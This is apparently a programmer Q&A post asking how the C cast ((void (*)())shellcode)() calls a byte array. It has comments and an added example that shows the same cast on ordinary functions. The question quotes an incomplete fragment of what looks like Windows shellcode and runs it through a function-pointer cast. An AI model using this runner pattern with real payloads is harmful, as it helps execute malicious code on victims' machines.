
Can someone please walk me through this one?

unsigned char shellcode[]=
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58";

int main(void)
{
    ((void (*)())shellcode)();
}

I know that usually `void (*)()` is a function pointer, but isn't the first `(*)` supposed to be the address of some function and the second `()` supposed to be some input parameters? I can sort of guess that in this case both of them come from `shellcode[]`, but can someone please explain to me how exactly?

Jonathan Leffler
tomu
    The example code shows a "call" to shellcode cast to be a function pointer. This won't work on systems with data execution prevention. – rcgldr Aug 12 '16 at 22:59
  • It's a cast. `void (*)()` is the syntax for the type "pointer to function (of unspecified arguments) returning void". You could rewrite it as: `typedef void myfun_t(); ((myfun_t *)shellcode)();` – melpomene Aug 12 '16 at 22:59
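The cast in the question is easier to see when it is applied to real functions rather than to a byte array, because the same declarator syntax works on any address. The block below is an added example, not code from the question or the comments: it takes the address of an ordinary function, erases its type through a `void *` (the same situation as `shellcode[]`, whose type is `unsigned char[]`), and then calls it through `((void (*)())p)()` exactly as the question does, plus the `typedef` form from melpomene's comment and a variant with parameters so the three sets of parentheses can be told apart. The function names `bump`, `add`, `generic_fn` and the two wrapper functions are the example's own. Converting between function and object pointers is not guaranteed by the C standard, but it is what the question's code relies on and it works on the usual compilers and ABIs; nothing here executes data as code, so it runs with DEP/NX enabled.

```c
#include <stdio.h>

/* Added example (not from the original question): the cast mechanics of
 * ((void (*)())p)() demonstrated on real functions instead of a byte array. */

static int counter = 0;

/* Ordinary functions that stand in for the code the array would hold. */
static void bump(void) { counter++; }
static int add(int a, int b) { return a + b; }

/* melpomene's alternative: name the function type once with a typedef. */
typedef void generic_fn(void);

/* Reading ((void (*)())p)() from the inside out:
 *   void (*)()   the TYPE "pointer to function taking unspecified args, returning void"
 *   (void (*)())p   a cast: treat the address p as a pointer of that type
 *   (...)()      the trailing () is the CALL, with an empty argument list
 * The (*) is not an address; it is the declarator that makes the type a pointer.
 * The second () is the parameter list of the pointed-to function, not arguments. */
int call_count_via_casts(void)
{
    counter = 0;
    void *p = (void *)bump;       /* erase the type, as shellcode[] has no function type */

    ((void (*)())p)();            /* the exact form used in the question */
    ((generic_fn *)p)();          /* the typedef form from the comment: same call */

    return counter;               /* each call above incremented it once */
}

/* The same shape with parameters: (int, int) is the parameter list inside the
 * type, and (2, 3) after the cast are the actual arguments of the call. */
int call_with_args_via_cast(void)
{
    void *p = (void *)add;
    return ((int (*)(int, int))p)(2, 3);
}

int main(void)
{
    printf("calls made through casts: %d\n", call_count_via_casts());
    printf("add(2, 3) through a cast: %d\n", call_with_args_via_cast());
    return 0;
}
```

Applying the same cast to `shellcode[]` compiles for the same reason it compiles here: the cast only changes how the compiler labels the address. What differs is that the array lives in a writable data section, which is why rcgldr's comment applies: with data execution prevention the jump into it faults.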

0 Answers